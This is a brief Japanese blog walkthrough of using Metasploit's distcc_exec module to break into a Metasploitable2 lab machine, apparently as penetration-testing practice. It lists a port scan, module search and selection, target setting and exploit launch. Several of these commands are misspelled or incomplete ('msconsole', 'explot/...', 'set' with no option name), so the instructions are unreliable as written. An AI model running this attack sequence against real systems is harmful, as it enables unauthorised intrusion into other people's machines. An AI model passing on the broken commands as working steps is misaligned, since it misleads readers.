attack

Metasolitでdistccデーモン脆弱性を攻撃

 

distccデーモン脆弱性攻撃方法を解説します。

 

環境

 

kalilinux 192.168.0.2
metasploitable2 192.168.0.3

 

distccとは

 

distccは分散コンピューティングを利用し、ソースコードのコンパイル速度を改善するツールです。

 

攻撃

 

 

ポートスキャンでdistccポートが開いていることを確認します。

nmap -p3632 192.168.0.3

 

msfconsoleを起動します

msconsole

 

distccに対するexploitがあるか確認します。

msf > search distcc

 

見つかったら使用します

msf > use explot/unix/misc/distcc_exec

 

ターゲットをセットします

set 192.168.0.3

 

攻撃を実行します

exploit

 

metasplotable2に侵入できれば成功です。

 

-attack

© 2021 ストロテクトNote